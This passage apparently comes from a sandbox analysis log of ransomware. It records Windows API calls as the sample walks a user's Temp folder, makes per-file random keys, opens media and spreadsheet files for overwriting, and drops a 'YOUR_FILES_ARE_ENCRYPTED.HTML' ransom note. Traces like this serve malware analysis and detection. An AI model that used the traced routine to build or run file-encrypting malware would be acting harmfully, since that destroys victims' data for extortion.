lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42eae1d0, ftCreationTime.dwHighDateTime=0x1d7d98b, ftLastAccessTime.dwLowDateTime=0xacc743a0, ftLastAccessTime.dwHighDateTime=0x1d7e1fb, ftLastWriteTime.dwLowDateTime=0xacc743a0, ftLastWriteTime.dwHighDateTime=0x1d7e1fb, nFileSizeHigh=0x0, nFileSizeLow=0x13180, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="yhTUsRbK USBCZS0QQpK.wav", cAlternateFileName="YHTUSR~1.WAV")) returned 1 [0164.313] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav") returned 67 
[0164.313] lstrcmpW (lpString1="yhTUsRbK USBCZS0QQpK.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.313] PathFindExtensionW (pszPath="yhTUsRbK USBCZS0QQpK.wav") returned=".wav" [0164.313] lstrlenW (lpString=".wav") returned 4 [0164.313] PathFindExtensionW (pszPath="yhTUsRbK USBCZS0QQpK.wav") returned=".wav" [0164.313] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\yhtusrbk usbczs0qqpk.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5dc [0164.313] GetFileSizeEx (in: hFile=0x5dc, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=78208) returned 1 [0164.314] GetProcessHeap () returned 0x270000 [0164.314] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7758c68 [0164.317] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="6E") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="C0") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="B4") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="96") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="EF") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="26") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="B1") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="A0") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="50") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="F1") returned 2 
[0164.317] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="2B") returned 2 [0164.317] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="4E") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="E6") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="2F") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="87") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B1") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="7A") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="63") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="02") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="74") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="AC") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="AB") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="7F") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="0E") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="58") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="9F") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="3A") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="AA") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="3F") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="84") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="05") returned 2 [0164.318] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: 
param_1="5C") returned 2 [0164.319] lstrcpyW (in: lpString1=0x7768d1c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\yhTUsRbK USBCZS0QQpK.wav" [0164.319] CreateIoCompletionPort (FileHandle=0x5dc, ExistingCompletionPort=0x3a0, CompletionKey=0x7758c68, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.319] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7758c68, lpOverlapped=0x7758c68) returned 1 [0164.319] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30983110, ftCreationTime.dwHighDateTime=0x1d7debb, ftLastAccessTime.dwLowDateTime=0x158e80a0, ftLastAccessTime.dwHighDateTime=0x1d7e013, ftLastWriteTime.dwLowDateTime=0x158e80a0, ftLastWriteTime.dwHighDateTime=0x1d7e013, nFileSizeHigh=0x0, nFileSizeLow=0x11709, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Z86YbAKEXD.gif", cAlternateFileName="Z86YBA~1.GIF")) returned 1 [0164.319] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif") returned 57 [0164.319] lstrcmpW (lpString1="Z86YbAKEXD.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0164.319] PathFindExtensionW (pszPath="Z86YbAKEXD.gif") returned=".gif" [0164.319] lstrlenW (lpString=".gif") returned 4 [0164.319] PathFindExtensionW (pszPath="Z86YbAKEXD.gif") returned=".gif" [0164.319] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\z86ybakexd.gif"), 
dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e0 [0164.320] GetFileSizeEx (in: hFile=0x5e0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=71433) returned 1 [0164.320] GetProcessHeap () returned 0x270000 [0164.320] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7780dc0 [0164.323] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="F8") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="E2") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="C6") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="82") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="CD") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="60") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="73") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="D2") returned 2 [0164.323] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="27") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="A5") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="4F") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="50") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="34") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="CA") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="8A") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="E5") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="A2") returned 2 [0164.324] 
wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="68") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="3E") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="96") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="D0") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="AB") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="CF") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="9C") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="EE") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="6E") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="6A") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="94") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="7B") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="79") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="30") returned 2 [0164.324] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="19") returned 2 [0164.325] lstrcpyW (in: lpString1=0x7790e74, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Z86YbAKEXD.gif" [0164.325] CreateIoCompletionPort (FileHandle=0x5e0, ExistingCompletionPort=0x3a0, CompletionKey=0x7780dc0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.325] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7780dc0, lpOverlapped=0x7780dc0) returned 1 [0164.325] FindNextFileW (in: 
hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5ada51f0, ftCreationTime.dwHighDateTime=0x1d7e24f, ftLastAccessTime.dwLowDateTime=0x909330c0, ftLastAccessTime.dwHighDateTime=0x1d7e4c3, ftLastWriteTime.dwLowDateTime=0x909330c0, ftLastWriteTime.dwHighDateTime=0x1d7e4c3, nFileSizeHigh=0x0, nFileSizeLow=0xd25f, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Zw7NPqE30QDSa5q.ods", cAlternateFileName="ZW7NPQ~1.ODS")) returned 1 [0164.325] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods") returned 62 [0164.325] lstrcmpW (lpString1="Zw7NPqE30QDSa5q.ods", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0164.325] PathFindExtensionW (pszPath="Zw7NPqE30QDSa5q.ods") returned=".ods" [0164.325] lstrlenW (lpString=".ods") returned 4 [0164.325] PathFindExtensionW (pszPath="Zw7NPqE30QDSa5q.ods") returned=".ods" [0164.325] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\zw7npqe30qdsa5q.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0164.326] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=53855) returned 1 [0164.326] GetProcessHeap () returned 0x270000 [0164.326] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77a8f18 [0164.717] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="1D") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="9F") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: 
param_1="9C") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="43") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="1B") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="A8") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="86") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="C0") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="FB") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="81") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="E8") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="A8") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="4C") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="73") returned 2 [0164.717] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="B9") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="E0") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="02") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="39") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="AE") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="36") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="F4") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="E6") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="A9") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="00") returned 2 [0164.718] wsprintfW (in: 
param_1=0x4ebd78a, param_2="%02X" | out: param_1="EE") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="EE") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="AE") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="B7") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="A7") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="CA") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="A5") returned 2 [0164.718] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="55") returned 2 [0164.719] lstrcpyW (in: lpString1=0x77b8fcc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Zw7NPqE30QDSa5q.ods" [0164.719] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x77a8f18, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.719] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77a8f18, lpOverlapped=0x77a8f18) returned 1 [0164.754] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb14d9ec0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xb14d9ec0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb14d9ec0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DF0EA31AB184F586BB.TMP", cAlternateFileName="~DF0EA~1.TMP")) returned 1 [0164.755] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\~DF0EA31AB184F586BB.TMP") returned 66 [0164.755] lstrcmpW (lpString1="~DF0EA31AB184F586BB.TMP", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.755] PathFindExtensionW (pszPath="~DF0EA31AB184F586BB.TMP") returned=".TMP" [0164.755] lstrlenW (lpString=".TMP") returned 4 [0164.755] PathFindExtensionW (pszPath="~DF0EA31AB184F586BB.TMP") returned=".TMP" [0164.755] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xab3fffa0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab3fffa0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab3fffa0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DF1891F92DEE8F97F3.TMP", cAlternateFileName="~DF189~1.TMP")) returned 1 [0164.755] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\~DF1891F92DEE8F97F3.TMP") returned 66 [0164.755] lstrcmpW (lpString1="~DF1891F92DEE8F97F3.TMP", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.755] PathFindExtensionW (pszPath="~DF1891F92DEE8F97F3.TMP") returned=".TMP" [0164.755] lstrlenW (lpString=".TMP") returned 4 [0164.755] PathFindExtensionW (pszPath="~DF1891F92DEE8F97F3.TMP") returned=".TMP" [0164.755] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xaba19800, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaba19800, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaba19800, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DF25B808F52B8C25D0.TMP", 
cAlternateFileName="~DF25B~1.TMP")) returned 1 [0164.755] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\~DF25B808F52B8C25D0.TMP") returned 66 [0164.755] lstrcmpW (lpString1="~DF25B808F52B8C25D0.TMP", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.755] PathFindExtensionW (pszPath="~DF25B808F52B8C25D0.TMP") returned=".TMP" [0164.755] lstrlenW (lpString=".TMP") returned 4 [0164.755] PathFindExtensionW (pszPath="~DF25B808F52B8C25D0.TMP") returned=".TMP" [0164.755] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xb1500020, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xb1500020, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb1500020, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DF780260E18E183789.TMP", cAlternateFileName="~DF780~1.TMP")) returned 1 [0164.755] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\~DF780260E18E183789.TMP") returned 66 [0164.755] lstrcmpW (lpString1="~DF780260E18E183789.TMP", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.756] PathFindExtensionW (pszPath="~DF780260E18E183789.TMP") returned=".TMP" [0164.756] lstrlenW (lpString=".TMP") returned 4 [0164.756] PathFindExtensionW (pszPath="~DF780260E18E183789.TMP") returned=".TMP" [0164.756] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb14d9ec0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xb14d9ec0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb1500020, 
ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DFA0E187D36AAD4505.TMP", cAlternateFileName="~DFA0E~1.TMP")) returned 1 [0164.756] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\~DFA0E187D36AAD4505.TMP") returned 66 [0164.756] lstrcmpW (lpString1="~DFA0E187D36AAD4505.TMP", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.756] PathFindExtensionW (pszPath="~DFA0E187D36AAD4505.TMP") returned=".TMP" [0164.756] lstrlenW (lpString=".TMP") returned 4 [0164.756] PathFindExtensionW (pszPath="~DFA0E187D36AAD4505.TMP") returned=".TMP" [0164.756] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xb14d9ec0, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xb14d9ec0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb14d9ec0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DFB260B44B84FD6F03.TMP", cAlternateFileName="~DFB26~1.TMP")) returned 1 [0164.756] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\~DFB260B44B84FD6F03.TMP") returned 66 [0164.756] lstrcmpW (lpString1="~DFB260B44B84FD6F03.TMP", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.756] PathFindExtensionW (pszPath="~DFB260B44B84FD6F03.TMP") returned=".TMP" [0164.756] lstrlenW (lpString=".TMP") returned 4 [0164.756] PathFindExtensionW (pszPath="~DFB260B44B84FD6F03.TMP") returned=".TMP" [0164.756] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xb14d9ec0, 
ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xb14d9ec0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb14d9ec0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="~DFB260B44B84FD6F03.TMP", cAlternateFileName="~DFB26~1.TMP")) returned 0 [0164.756] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0164.757] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 72 [0164.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0164.758] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0164.760] CloseHandle (hObject=0x598) returned 1 [0164.761] GetProcessHeap () returned 0x270000 [0164.761] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.765] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0xd26fc530, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd26fc530, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd26fc530, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Temporary Internet Files", 
